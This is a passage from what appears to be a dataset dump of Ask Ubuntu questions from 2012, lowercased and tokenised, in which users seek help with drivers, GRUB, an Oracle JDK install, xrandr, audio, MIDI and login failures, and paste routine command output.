04 ) 00:1a.0 usb controller [ 0c03 ] : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 2 [ 8086:1c2d ] ( rev 05 ) 00:1b.0 audio device [ 0403 ] : intel corporation 6 series/c200 series chipset family high definition audio controller [ 8086:1c20 ] ( rev 05 ) 00:1c.0 pci bridge [ 0604 ] : intel corporation 6 series/c200 series chipset family pci express root port 1 [ 8086:1c10 ] ( rev b5 ) 00:1c.1 pci bridge [ 0604 ] : intel corporation 6 series/c200 series chipset family pci express root port 2 [ 8086:1c12 ] ( rev b5 ) 00:1c.2 pci bridge [ 0604 ] : intel corporation 6 series/c200 series chipset family pci express root port 3 [ 8086:1c14 ] ( rev b5 ) 00:1d.0 usb controller [ 0c03 ] : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 1 [ 8086:1c26 ] ( rev 05 ) 00:1f.0 isa bridge [ 0601 ] : intel corporation hm65 express chipset family lpc controller [ 8086:1c49 ] ( rev 05 ) 00:1f.2 sata controller [ 0106 ] : intel corporation 6 series/c200 series chipset family 6 port sata ahci controller [ 8086:1c03 ] ( rev 05 ) 00:1f.3 smbus [ 0c05 ] : intel corporation 6 series/c200 series chipset family smbus controller [ 8086:1c22 ] ( rev 05 ) 01:00.0 network controller [ 0280 ] : ralink corp. rt5390 wireless 802.11n 1t/1r pcie [ 1814:5390 ] 02:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller [ 10ec:8136 ] ( rev 05 ) 03:00.0 unassigned class [ ff00 ] : realtek semiconductor co. , ltd. rts5116 pci express card reader [ 10ec:5209 ] ( rev 01 ) jeff @ localhost : ~ $ /usr/lib/nux/unity_support_test -p opengl vendor string : vmware , inc. opengl renderer string : gallium 0.4 on llvmpipe ( llvm 0x300 ) opengl version string : 2.1 mesa 8.0.2 not software rendered : no not blacklisted : yes glx fbconfig : yes glx texture from pixmap : yes gl npot or rect textures : yes gl vertex program : yes gl fragment program : yes gl vertex buffer object : yes gl framebuffer object : yes gl version is 1.4+ : yes unity 3d supported : no to reiterate , i 'm using a new hp pavilion g4 purchased from best buy . i could not install ubuntu 12.04 with the regular install disc so i used the alternate disc with nomodeset selected . if i needed to change something within the system after doing this , i do n't know what that is . upon realizing that i was not running unity but had unity 2d , i started trying to figure out why but i could not find an explanation for this result online . ubuntu currently has the vesa : intel速sandybridge mobile graphics driver running . update : i installed the ati binary x.org driver . i then looked at additional drivers and nothing appears there ! i restarted the system and still found no drivers there to enable . what else can i do ? update2 : i am not running in a virtual machine . ubuntu 12.04 is installed on its own partition on my hard drive . can anybody tell me if there is something about my video card that is incompatible with unity ? i would imagine if it can run windows 7 it can run unity . i 've tried everything here and have not been able to get anything to work .
176272	installing oracle jdk , and repairing apt-get	i installed openjdk as soon as i installed the os . then i downloaded intellij idea and tried running it . it displayed a warning that idea has known graphics issues with openjdk and that i should install oracle jdk . idea works just fine except for its poorly rendered fonts and other ui elements . i wanted to improve my user experience , and so i decided to install oracle jdk . googling some keywords landed me on this page . i followed the instructions on the given page but the installation failed with this error : $ sudo apt-get install oracle-java7-installer reading package lists ... done building dependency tree reading state information ... done the following packages were automatically installed and are no longer required : diffstat libclucy-clojure linux-headers-3.2.0-26-generic linux-headers-3.2.0-26 dh-apparmor icedtea-netx-common dkms clojure-contrib html2text libmail-sendmail-perl libsys-hostname-long-perl clojure1.2 use 'apt-get autoremove ' to remove them . suggested packages : visualvm ttf-kochi-gothic ttf-sazanami-gothic ttf-kochi-mincho ttf-sazanami-mincho ttf-arphic-uming the following packages will be upgraded : oracle-java7-installer 1 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 1 not fully installed or removed . need to get 0 b/15.3 kb of archives . after this operation , 3,072 b of additional disk space will be used . setting up oracle-java7-installer ( 7u3-0~eugenesan~precise4 ) ... downloading ... -- 2012-08-16 00:39:21 -- http : //download.oracle.com/otn-pub/java/jdk/7u3-b04/jdk-7u3-linux-x64.tar.gz resolving download.oracle.com ( download.oracle.com ) ... 1.186.191.202 , 1.186.191.200 connecting to download.oracle.com ( download.oracle.com ) |1.186.191.202|:80 ... connected . http request sent , awaiting response ... 302 moved temporarily location : https : //edelivery.oracle.com/otn-pub/java/jdk/7u3-b04/jdk-7u3-linux-x64.tar.gz [ following ] -- 2012-08-16 00:39:21 -- https : //edelivery.oracle.com/otn-pub/java/jdk/7u3-b04/jdk-7u3-linux-x64.tar.gz resolving edelivery.oracle.com ( edelivery.oracle.com ) ... 23.57.126.174 connecting to edelivery.oracle.com ( edelivery.oracle.com ) |23.57.126.174|:443 ... connected . http request sent , awaiting response ... 302 moved temporarily location : http : //download.oracle.com/errors/download-fail-1505220.html [ following ] -- 2012-08-16 00:39:22 -- http : //download.oracle.com/errors/download-fail-1505220.html connecting to download.oracle.com ( download.oracle.com ) |1.186.191.202|:80 ... connected . http request sent , awaiting response ... 200 ok length : 5307 ( 5.2k ) [ text/html ] saving to : `./jdk-7u3-linux-x64.tar.gz' 0k ... .. 100 % 213k=0.02s 2012-08-16 00:39:22 ( 213 kb/s ) - `./jdk-7u3-linux-x64.tar.gz ' saved [ 5307/5307 ] download done . sha256sum mismatch jdk-7u3-linux-x64.tar.gz oracle jdk 7 is not installed . dpkg : error processing oracle-java7-installer ( -- configure ) : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : oracle-java7-installer e : sub-process /usr/bin/dpkg returned an error code ( 1 ) now the status is that i do n't have oracle jdk installed , and my apt-get is messed up . running sudo apt-get upgrade gives following error : missingfaktor @ thousand-sunny : ~ $ sudo apt-get upgrade reading package lists ... done building dependency tree reading state information ... done the following packages will be upgraded : oracle-java7-installer 1 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 1 not fully installed or removed . need to get 0 b/15.3 kb of archives . after this operation , 3,072 b of additional disk space will be used . do you want to continue [ y/n ] ? y setting up oracle-java7-installer ( 7u3-0~eugenesan~precise4 ) ... downloading ... -- 2012-08-16 01:28:37 -- http : //download.oracle.com/otn-pub/java/jdk/7u3-b04/jdk-7u3-linux-x64.tar.gz resolving download.oracle.com ( download.oracle.com ) ... 1.186.191.202 , 1.186.191.200 connecting to download.oracle.com ( download.oracle.com ) |1.186.191.202|:80 ... connected . http request sent , awaiting response ... 302 moved temporarily location : https : //edelivery.oracle.com/otn-pub/java/jdk/7u3-b04/jdk-7u3-linux-x64.tar.gz [ following ] -- 2012-08-16 01:28:37 -- https : //edelivery.oracle.com/otn-pub/java/jdk/7u3-b04/jdk-7u3-linux-x64.tar.gz resolving edelivery.oracle.com ( edelivery.oracle.com ) ... 23.57.126.174 connecting to edelivery.oracle.com ( edelivery.oracle.com ) |23.57.126.174|:443 ... connected . http request sent , awaiting response ... 302 moved temporarily location : http : //download.oracle.com/errors/download-fail-1505220.html [ following ] -- 2012-08-16 01:28:37 -- http : //download.oracle.com/errors/download-fail-1505220.html connecting to download.oracle.com ( download.oracle.com ) |1.186.191.202|:80 ... connected . http request sent , awaiting response ... 200 ok length : 5307 ( 5.2k ) [ text/html ] saving to : `./jdk-7u3-linux-x64.tar.gz' 0k ... .. 100 % 220k=0.02s 2012-08-16 01:28:37 ( 220 kb/s ) - `./jdk-7u3-linux-x64.tar.gz ' saved [ 5307/5307 ] download done . sha256sum mismatch jdk-7u3-linux-x64.tar.gz oracle jdk 7 is not installed . dpkg : error processing oracle-java7-installer ( -- configure ) : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : oracle-java7-installer e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i need that command to work for quite a few reasons . so i really have two questions : what do i need to do so that apt-get functions as before ? how do i install oracle jdk , and is it recommended to do so ?
176279	how can i run update-grub if i ca n't boot into linux ?	i 'm trying to install ubuntu server 12.04 onto an old hp dl320 g2 . this has a ati rage xl video card built in . everything seems to install okay , but i 'm having problems with booting . once the server starts booting , the screen goes black after posting , and nothing else is displayed -- no grub menu , error messages , etc . ( i left it like that all night ) . if i hold down the [ shift ] key , 'loading grub ' is displayed , but once again nothing after that . i have read several suggestions on how to fix this ( and similar problems ) by modifying the /etc/default/grub file and then running sudo update-grub . how can i run update-grub if it does n't seem to be booting all the way into linux ? i think there must be an error occurring , preventing it from fully starting . however , i ca n't see anything to know for sure .
176280	how do i update sublime text 2 ?	i have sublime text 2 installed and i have it configured to my liking . there is a newer version of sublime text 2 , but i have put off downloading it since i do not want to loose my configuration . i was told to just extract the downloaded tar file over the existing files but i am a bit nervous about doing this , since i do not want to loose all of the extensions i have added to sublime text nor do i want to lose my configuration , and also i am not sure how to do this . i have the newer version downloaded and it is in /var/cache/sublime-text-2/sublime text 2 build 2181.tar.bz2 i believe my existing sublime text 2 editor is in /usr/lib/sublime-text-2 . can anyone give me some direction as to how to extract the latest sublime text 2 to be found in /var/cache/ and ensure that it is extracted to /usr/lib/sublime-text-2 . of course the next question is ; can i do this without losing the extensions i have added to sublime text 2 ? thanks for any suggestions or guidance you can give .
176283	change thinkpad bios splash screen	i saw that you can change the bios screen of thinkpads . this is the readme from the windows bios update utility : ********************************************************************** * * * notes on custom start up image * * -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- * * * * this version of the flash update program gives the option of * * replacing ( or eliminating ) the default `` lenovo '' image that is * * displayed during system start up . * * * * guidelines for custom start up image : * * * * 1 . the image file size is limited to 30kb . * * 2 . resolution of the image should be less than 640x480 . * * 3 . valid formats for the image are as follows : * * bitmap ( .bmp ) file format * * jpeg ( .jpg ) file format * * gif ( .gif ) file format * * * * steps to enable custom start up image : * * * * 1 . prepare your image and copy it to the same place where * * winuptp.exe exists . * * 2 . rename the image as follows . * * bitmap file -- > logo.bmp * * jpeg file -- > logo.jpg * * gif file -- > logo.gif * * 3 . run winuptp.exe and follow instructions . * * * * after you update the bios on your system , your logo will * * appear on the startup screen . * * * ********************************************************************** is there any way to do this from ubuntu ? i do not have windows installed .
176287	connection refused on localhost 25 ( apache james )	i was looking at a similar question , but all that i gather is that it could be a problem with the os and not james precisely : thufir @ dur : ~/apache-james-3.0-beta4 $ thufir @ dur : ~/apache-james-3.0-beta4 $ bin/james start starting apache james server app ... thufir @ dur : ~/apache-james-3.0-beta4 $ thufir @ dur : ~/apache-james-3.0-beta4 $ telnet localhost 25 trying 127.0.0.1 ... telnet : unable to connect to remote host : connection refused thufir @ dur : ~/apache-james-3.0-beta4 $ thufir @ dur : ~/apache-james-3.0-beta4 $ telnet 127.0.0.1 25 trying 127.0.0.1 ... telnet : unable to connect to remote host : connection refused thufir @ dur : ~/apache-james-3.0-beta4 $ thufir @ dur : ~/apache-james-3.0-beta4 $ cat log/james-server.log info 02:23:21,406 | org.apache.james.container.spring.context.jamesserverapplicationcontext | refreshing org.apache.james.container.spring.context.jamesserverapplicationcontext @ 3ee0b7 : startup date [ wed aug 15 02:23:21 pdt 2012 ] ; root of context hierarchy info 03:33:22,785 | org.apache.james.container.spring.context.jamesserverapplicationcontext | refreshing org.apache.james.container.spring.context.jamesserverapplicationcontext @ 13336f : startup date [ wed aug 15 03:33:22 pdt 2012 ] ; root of context hierarchy info 11:26:26,082 | org.apache.james.container.spring.context.jamesserverapplicationcontext | refreshing org.apache.james.container.spring.context.jamesserverapplicationcontext @ 3ee0b7 : startup date [ wed aug 15 11:26:26 pdt 2012 ] ; root of context hierarchy info 11:40:31,812 | org.apache.james.container.spring.context.jamesserverapplicationcontext | refreshing org.apache.james.container.spring.context.jamesserverapplicationcontext @ d51c6c : startup date [ wed aug 15 11:40:31 pdt 2012 ] ; root of context hierarchy info 13:00:10,698 | org.apache.james.container.spring.context.jamesserverapplicationcontext | refreshing org.apache.james.container.spring.context.jamesserverapplicationcontext @ 3ee0b7 : startup date [ wed aug 15 13:00:10 pdt 2012 ] ; root of context hierarchy info 13:59:51,478 | org.apache.james.container.spring.context.jamesserverapplicationcontext | refreshing org.apache.james.container.spring.context.jamesserverapplicationcontext @ 13d1929 : startup date [ wed aug 15 13:59:51 pdt 2012 ] ; root of context hierarchy thufir @ dur : ~/apache-james-3.0-beta4 $ the quick start specifies : step 7 : test # # # # # # # # # # # # $ telnet 127.0.0.1 25 trying 127.0.0.1 ... connected to localhost . escape character is '^ ] ' . 220 172.16.1.131 smtp server ( james smtp server 3.0-beta4 ) ready sat , 6 nov 2010 17:31:33 +0100 ( cet ) ehlo test however , it 's not showing in netstat : thufir @ dur : ~/apache-james-3.0-beta4 $ thufir @ dur : ~/apache-james-3.0-beta4 $ bin/james start starting apache james server app ... thufir @ dur : ~/apache-james-3.0-beta4 $ thufir @ dur : ~/apache-james-3.0-beta4 $ netstat -l -- numeric-ports | grep james thufir @ dur : ~/apache-james-3.0-beta4 $ so , bingo , that 's the key , i think . why does n't james show in netstat if it 's indeed running ?
176288	kubuntu 12.04 loging failure	when i load up kubuntu 12.04 and i type in my password the loading screen only gives me one icon . after a minute it goes back to the login screen . can anyone please help me and tell what to do so i can log back into kubuntu 12.04 ?
176293	how can i get optimized , non-stripped versions of libc and vmlinuz ?	a commonly done task is to profile things . profiling is rarely done on debug builds . ubuntu seems to either give you the choice of stripped optimized executables or debug builds . i 've run into this on both libc and vmlinux- ... which i extracted out of vmlinuz . after i extracted it i found that it was stripped . do i have to build my own system libraries just to get symbols ? do symbols really take that much memory or disk ? the full debug version lib libc is only 7.6mb 's and is shared across all running processes ! the optimized version , with symbols should be similarly tiny . why are these stripped ? what apt-get do i need for libc and vmlinuz to get optimized non-stripped versions ?
176295	sound settings is missing all output devices	i 'm baffled by this discrepancy : this speaker test is successful : speaker-test -c 6 -d 'surround51 : card=pch , dev=0' sound settings is behaving as if i have no sound card : how do i find out what 's causing this problem ? details have a look at aplay -l , pacmd list-cards , lshw , pulseaudio -vvvv , and pavucontrol . i do not use hdmi . this discussion of a similar problem on a pulseaudio mailing list suggests that changes to /etc/pulse/default.pa might be responsible , but i have not edited this file .
176299	login help ! ubuntu 12.04.1 lts	i am fairly new to ubuntu . i am trying to install it to an old dell inspiron 600m and have run into a problem during the login . everything well well up til now . when i try to login , nothing happens . all i get is this : ubuntu 12.04.1 lts ubuntu-name tty1 ubuntu-name login : name last login : wed aug 15 16:28:41 cdt 2012 on tty1 welcome to ubuntu 12.04.1 lts ( gnu/linux 3.2.0-29-generic i686 ) * documentation : https : //help.ubuntu.com/ name @ ubuntu-name : ~ $ the ~ is higher and smaller though . i am not sure what i did wrong , if i did anything wrong . thank you in advance to anyone who helps !
176300	xrandr as root can not find displays	i have the following rule call my script when i dock or un-dock my thinkpad : # /lib/udev/rules.d/81-thinkpad-dock.rules kernel== '' dock.0 '' , attr { docked } == '' 0 '' , run+= '' /usr/bin/think-dock-hook off '' kernel== '' dock.0 '' , attr { docked } == '' 1 '' , run+= '' /usr/bin/think-dock-hook on '' that is the script that will be called : # /usr/bin/think-dock-hook # find the user who is currently logged in on the primary screen . user= '' $ ( who -u | grep -f ' ( :0 ) ' | head -n 1 | awk ' { print $ 1 } ' ) '' su -c `` bash -x /usr/bin/think-dock $ setto '' `` $ user '' > > /root/think-dock.log 2 > & 1 & and the script that is then called does something with xrandr . the thing is that i can run think-dock on as my user ( mu ) and it works . i can sudo -i and run think-dock-hook on and it works too . but when i let udev run it , it just get the following error from xrandr : # output of bash -x think-dock on + xrandr -- output lvds1 -- auto ca n't open display now if i call xrandr from my sudo -i shell , i get : no protocol specified no protocol specified ca n't open display :0 however , if i do su -c xrandr mu from my sudo -i shell , i get the expected output . so i do not really understand , the script called from udev fails .
176301	play minecraft on ubuntu ?	so , i have downloaded and installed java multiple different ways , but i can not get minecraft to work . i really do n't know what 's going on , so i do n't know how to explain it , but check out this video to see it in action : http : //youtu.be/zn9pmmjzqw0 if you would like to see the logs , they can be downloaded here : http : //www.mediafire.com/ ? xgbxoe37gq79b
176306	how to change the screen resolution of the virtual console on an external vga ?	i 've found helpful solutions to randr problems on the regular gui ( ctrl+alt+f7 ) but this question is about resizing the virtual console , which does n't have good google results . i 've been using arandr to change vga outputs between my 1680×1050 monitor and digital projector with i think a different ratio ( definitely smaller numbers ) . noticed a few quirky things like i need to resize vga , then resize lvds , then resize vga again ( possibly multiple repeats ) to reduce the maximum screen size between going back and forth these two devices the most recent time i somehow reduced the resolution of the virtual console ( ctrl+alt+f6 ) which i use most of the day . the virtual console still shows up correctly on the lvds but i 'd like to change the vga resolution so i can watch the virtual console on my monitor . it was projecting at a nice large resolution before my most recent switch to projector and back . ( i even looked at the virtual console on the projector and it was large resolution . ) any suggestions what i might need to do here ? i tried xrandr -- output vga -- mode 1680x1050 and got ca n't open display error . let me know if there 's any other info i should give .
176308	ca n't install ubuntu on asus a42f	i am really going crazy here , i tried many times to install ubuntu 12.4 on my asus from a usb ( do n't have a working cd drive ) and every time the installation process goes perfectly smooth until it asks me to reboot to finish the installation process and then keaboom i reboot nothing is there but a black dos screen talking about errors and asking me to put my win7 ( which i loathe more than anything in this life ) so what did i do wrong , does asus a42f does n't accept 32bit version which i am trying to install ? or i have to install ubuntu along with win7 ? although there is a choice to install ub and get rid of win7 ? i really need some serious help to install it step by step please thank u very much for your time ?
176314	how to tell which image file is being used as wallpaper in wallch	i 've just installed wallch , and it 's working wonderfully . i have set the program to cycle a huge number of images all within a folder on my computer . there are so many images that i 've forgotten about many of the ones popping up ! i 'm like to look into what they are . is there any way to tell which image is currently my background ? i 'd expect the answer to be in some linux code i ' unfamiliar with , or a hidden feature of wallch . i found nothing in the wallch gui nor the appearance settings . i 'm running ubuntu 12.4 and wallch 3.0 .
176316	installation issue in msi gt780dx , screen freezes	configuration : i7 2670 , nvidia gtx 570 , 1920x1080 , 17.3 '' , hdd 750gb , ram 12 gb , trying to install under windows 7 , 64bit . used 64 bit ubuntu for installation , both 12.04 and 11.04 , none worked , in 12 , display problem , and 11 freezes , both after installation , while booting .
176317	how do i add a gwibber entry widget to my app ?	i am writing an app which has a button that , when clicked , should launch a gwibber entry widget . this used to work , as suggested on the tutorial : from gi.repository import gwibbergtk entry = gwibbergtk.entry ( ) add ( entry ) but now it does n't anymore on my computer . i encountered the error importerror : can not import name gwibbergtk . so , as suggested here , i installed gir1.2-gwibber-0.2 and i changed the first line of my code into from gi.repository import gwibber but the problem is that this `` gwibber '' object has no `` entry '' method . what should i use to create an entry widget as beforeâ ? will the method you advice me be compatible on computers on which my app will be distributedâ ?
176322	removing old kernel entries in grub	i regularly delete old kernels leaving only the latest two entries using synaptic . i 'm using precise . however in my grub `` previous linux version '' menu there are quite a few entries labelled 2.6.8 . i can not find these linux-images in synaptic . dpkg -l | grep linux-image gives : rc linux-image-3.0.0-17-generic 3.0.0-17.30 linux kernel image for version 3.0.0 on x86/x86_64 ii linux-image-3.2.0-27-generic 3.2.0-27.43 linux kernel image for version 3.2.0 on 32 bit x86 smp ii linux-image-3.2.0-29-generic 3.2.0-29.46 linux kernel image for version 3.2.0 on 32 bit x86 smp ii linux-image-3.4.0-030400-generic 3.4.0-030400.201205210521 linux kernel image for version 3.4.0 on 32 bit x86 smp ii linux-image-generic 3.2.0.29.31 generic linux kernel image sudo update-grub gives : generating grub.cfg ... found linux image : /boot/vmlinuz-3.4.0-030400-generic found initrd image : /boot/initrd.img-3.4.0-030400-generic found linux image : /boot/vmlinuz-3.2.0-29-generic found initrd image : /boot/initrd.img-3.2.0-29-generic found linux image : /boot/vmlinuz-3.2.0-27-generic found initrd image : /boot/initrd.img-3.2.0-27-generic found linux image : /boot/vmlinuz-2.6.38-11-generic found initrd image : /boot/initrd.img-2.6.38-11-generic found linux image : /boot/vmlinuz-2.6.38-10-generic found initrd image : /boot/initrd.img-2.6.38-10-generic found linux image : /boot/vmlinuz-2.6.38-8-generic found initrd image : /boot/initrd.img-2.6.38-8-generic found memtest86+ image : /boot/memtest86+.bin found windows vista ( loader ) on /dev/sda1 sudo apt-get remove linux-image-2.6.8-8-generic gives : e : unable to locate package linux-image-2.6.8-8-generic e : could n't find any package by regex 'linux-image-2.6.8-8-generic' my boot folder contains the following : abi-2.6.38-10-generic initrd.img-3.4.0-030400-generic abi-2.6.38-11-generic memtest86+.bin abi-2.6.38-8-generic memtest86+_multiboot.bin abi-3.2.0-27-generic system.map-2.6.38-10-generic abi-3.2.0-29-generic system.map-2.6.38-11-generic abi-3.4.0-030400-generic system.map-2.6.38-8-generic config-2.6.38-10-generic system.map-3.2.0-27-generic config-2.6.38-11-generic system.map-3.2.0-29-generic config-2.6.38-8-generic system.map-3.4.0-030400-generic config-3.2.0-27-generic vmcoreinfo-2.6.38-10-generic config-3.2.0-29-generic vmcoreinfo-2.6.38-11-generic config-3.4.0-030400-generic vmcoreinfo-2.6.38-8-generic extlinux vmlinuz-2.6.38-10-generic grub vmlinuz-2.6.38-11-generic initrd.img-2.6.38-10-generic vmlinuz-2.6.38-8-generic initrd.img-2.6.38-11-generic vmlinuz-3.2.0-27-generic initrd.img-2.6.38-8-generic vmlinuz-3.2.0-29-generic initrd.img-3.2.0-27-generic vmlinuz-3.4.0-030400-generic initrd.img-3.2.0-29-generic and ls -l /etc/grub.d yields : total 56 -rwxr-xr-x 1 root root 6715 apr 17 20:16 00_header -rwxr-xr-x 1 root root 5522 oct 1 2011 05_debian_theme -rwxr-xr-x 1 root root 7407 may 17 09:22 10_linux -rwxr-xr-x 1 root root 6335 apr 17 20:16 20_linux_xen -rwxr-xr-x 1 root root 1588 may 3 2011 20_memtest86+ -rwxr-xr-x 1 root root 7603 apr 17 20:16 30_os-prober -rwxr-xr-x 1 root root 214 oct 1 2011 40_custom -rwxr-xr-x 1 root root 95 oct 1 2011 41_custom -rw-r -- r -- 1 root root 483 oct 1 2011 readme gdisk -l /dev/sda yields : partition table scan : mbr : mbr only bsd : not present apm : not present gpt : not present *************************************************************** found invalid gpt and valid mbr ; converting mbr to gpt format . *************************************************************** disk /dev/sda : 312581808 sectors , 149.1 gib logical sector size : 512 bytes disk identifier ( guid ) : f832a498-05e1-4615-b5b1-757acb4a757a partition table holds up to 128 entries first usable sector is 34 , last usable sector is 312581774 partitions will be aligned on 2048-sector boundaries total free space is 4183661 sectors ( 2.0 gib ) number start ( sector ) end ( sector ) size code name 1 2048 61442047 29.3 gib 0700 microsoft basic data 3 163842048 169986047 2.9 gib 8200 linux swap 4 169986048 312578047 68.0 gib 0700 microsoft basic data 5 61444096 159666175 46.8 gib 8300 linux filesystem please help with removing the old and inexistent kernels from grub .
176326	how do i install maxthon 3 ?	i 've been trying to find a way to install maxthon 3 on ubuntu but it 's not working and it does n't work in wine ever so . help or suggestion on the topic that helps me run maxthon good will be nice .
176332	writing scripts with arguments ?	i want to write shell script that takes an argument , and then applies it to files . specifically , i want to give a term , and then have it compile term.as with mxmlc ( `` mxmlc term.as '' ) , then run term.swf with flashplayerdebugger ( `` flashplayerdebugger term.swf '' ) . i 'm fairly new to shell scripting - any thoughts ?
176337	installed perfectly but password not working for login or authentication	i installed ubuntu on an old xp machine ( replaced xp with ubuntu ) and it seemed like it went well ... until i tried to download and install the suggested updates ! the password i set during installation will not work for authentication . it wo n't even work for the user account . i thought maybe i 'd typed the password wrong ( twice ) and checked online how to change it . holding shift during start up wo n't give me boot options or grub so i ca n't get into recovery mode ! i 've reinstalled three times ( twice with the cd , once with the usb ) and it 's the same deal . basically , i 'm sure i typed the password correctly , so i severely doubt that changing the password will help . it will automatically log in if i set it to do so during installation . otherwise , i can only use the guest account and obviously ca n't setup another account or update software . this is my first experience with ubuntu and until it asked for the password , i thought it had gone so well . i sincerely hope i 've missed something simple and i can get this working properly . i 'm surprised that i have n't found any questions with exactly the same issue . please help ! : ) requested information 1 : df -h filesystem size used avail use % mounted on /dev/sda1 147g 4.7g 135g 4 % / udev 1000m 4.0k 1000m 1 % /dev tmpfs 403m 836k 402m 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 1007m 176k 1007m 1 % /run/shm /dev/sdc1 7.5g 4.7g 2.8g 63 % /media/pendrive patricia @ [ computer name removed by me just in case it should n't be shared ] 2 : dpkg -l | egrep 'lightdm|gdm|kdm|lxdm' ii liblightdm-gobject-1-0 1.2.1-0ubuntu1 lightdm gobject client library ii lightdm 1.2.1-0ubuntu1 display manager 3 : regarding whether or not there were error messages when logging in to a virtual console and attempting to change the password with passwd and sudo passwd $ user : no , i had to do the mount remount thing first but it said the password was successfully changed after that . it also tells me that i 've successfully logged in ... new development : i can now login to the user account created during setup ... . i still ca n't use that password to authenticate though ! hopefully we 're getting closer.. thanks so much for all your help : )
176344	how to solve wirelesss router issues vs. isp issues	so i 've been having a lot of issues with my internet connection since installing 12.04 . this is happening on both of my laptops that run this version . my mac has no issues although i did just notice one page that took a while to load . which brings me to the question . what tools should i get and how would i go about testing whether the issue is at the wireless or the actual internet . is there something that could monitor and tell me if there are lapses in connection ? this whole time i 've been assuming that my older laptop ( 2005 ) and my netbook are just not getting along with ubuntu 12.04 but it would be nice to be able to actually test this rather than just assume ... even though the mac is good 99 % of the time ... maybe the router is conflicting with ubuntu ? maybe the internet goes in and out ? who knows ... thanks !
176349	how to setup midi input ?	i have ubuntu 12.04 and want to setup a m-audio axiom 49 . i have tried to read up on jackd1 / jackdmp /jackd2 / qjackctl and whatnot , but have n't gotten any sound from the keyboard yet . a long time ago i managed to get sound from it using rosegarden and qjackctl , but not anymore . i have timidity installed and can play midi audio with it . in rosegarden there are no available midi input devices when the keyboard is plugged in and turned on . in qjackctls connections window in the midi tab there are no `` readable clients '' , even when running vkeybd and zynaddsubfx and having my keyboard plugged in . from lsusb i can see : bus 005 device 002 : id 0763:0199 midiman axiom 49 from cat /proc/asound/cards : 0 [ pch ] : hda-intel - hda intel pch hda intel pch at 0xfbf20000 irq 93 1 [ generic ] : hda-intel - hd-audio generic hd-audio generic at 0xfbe40000 irq 94 what do i need to do to get audio from my keyboard ? tags += jackd , timidity ( website wouldnt let me add those )
176351	how do i completely reset network settings ?	when i first installed ubuntu , all networking worked perfectly . after messing with the settings every so often , it slowly became unusable . i would really like to know if there is a way to completely reset network settings without re-installing ubuntu , dns settings , proxy settings , everything . i 'm running 12.04 .
176357	fresh install of 12.04 desktop freezes/unresponsive/goes black after login	i did a clean install of ubuntu 12.04 desktop onto my dell xps 410n with an nvidia geforce gts 8800 graphics card . i always enable auto-login-to-desktop . the first boot went ok , except that as soon as the desktop showed up , the screen looked strange : the desktop was too big for the monitor and appeared off center . i managed to bring up the screen settings panel , and switching away then back to the current resolution fixed things . during this boot i was prompted to ( and did ) install/activate `` version current '' of the nvidia drivers ( from 173 ) . i also upgraded some 300+ packages via update manager . after rebooting and the desktop appeared , it took about a minute after the wallpaper appeared for the menu bar to appear . although i could move the mouse , nothing was responding to my clicks/key presses . i could , however , ctrl-alt-f2 ( each time it would take 15s or so to actually switch to the terminal , though ) . when i ctrl-alt-f7 back to the desktop , the screen is just black , though i do see my network manager menu ( one of the things i tried clicking before ) a in a strange artifacted manner . that was the last response i was able to get from my system . subsequent switches away then back to ctrl-alt-f7 just showed black screens . i looked through some logs but the only thing possibly suspicious i noticed was in xorg.0.log : [ 22.045 ] ( ee ) failed to load module `` nv '' ( module does not exist , 0 ) but the nvidia driver is loaded . any ideas ? per https : //wiki.ubuntu.com/x/troubleshooting/freeze , here 's lshw , lspci , kern.log , dmesg , syslog , and xorg.0.log : https : //gist.github.com/3365293 tia .
176361	software-center is not opening and this is the error	2012-08-16 04:18:54,681 - softwarecenter.ui.gtk3.em - info - em 's : 17 15 21 traceback ( most recent call last ) : file `` /usr/bin/software-center '' , line 149 , in from softwarecenter.ui.gtk3.app import softwarecenterappgtk3 file `` /usr/share/software-center/softwarecenter/ui/gtk3/app.py '' , line 82 , in from softwarecenter.ui.gtk3.panes.installedpane import installedpane file `` /usr/share/software-center/softwarecenter/ui/gtk3/panes/installedpane.py '' , line 43 , in from softwarecenter.backend.oneconfhandler import get_oneconf_handler file `` /usr/share/software-center/softwarecenter/backend/oneconfhandler.py '' , line 25 , in from softwarecenter.backend.restfulclient import get_ubuntu_sso_backend file `` /usr/share/software-center/softwarecenter/backend/restfulclient.py '' , line 36 , in from lazr.restfulclient.resource import serviceroot file `` /usr/lib/python2.7/dist-packages/lazr/restfulclient/__init__.py '' , line 19 , in import pkg_resources file `` /usr/lib/python2.7/dist-packages/pkg_resources.py '' , line 2692 , in add_activation_listener ( lambda dist : dist.activate ( ) ) file `` /usr/lib/python2.7/dist-packages/pkg_resources.py '' , line 668 , in subscribe callback ( dist ) file `` /usr/lib/python2.7/dist-packages/pkg_resources.py '' , line 2692 , in add_activation_listener ( lambda dist : dist.activate ( ) ) file `` /usr/lib/python2.7/dist-packages/pkg_resources.py '' , line 2196 , in activate map ( declare_namespace , self._get_metadata ( 'namespace_packages.txt ' ) ) file `` /usr/lib/python2.7/dist-packages/pkg_resources.py '' , line 1791 , in declare_namespace _handle_ns ( packagename , path_item ) file `` /usr/lib/python2.7/dist-packages/pkg_resources.py '' , line 1756 , in _handle_ns raise typeerror ( `` not a package : '' , packagename ) typeerror : ( 'not a package : ' , 'google ' )
176365	ubuntu wo n't install on windows 8 hd	so basically i installed windows 8 and have not found it a decent os , to my chagrin when i tried to install the latest ubuntu via flash , the flash drive would n't load . it just went to the windows 8 startup page . i changed the boot settings and everything , any thoughts ? note : flash drive created from uncompressing the iso onto my flash drive via 7zip .
176368	suggestions on how to speed up 12.04 ?	i use thinkpad x100e : amd athlon neo x2 1.6 ghz , ram 4gb ( 3.6 gb available ) . i installed 12.04 64-bit ( with windows installer ) on 40gb of hard disk space . i have some problem about lag speed of the os . can anyone suggest me how to disable or turn off any feature to increase the speed performance of ubuntu ?
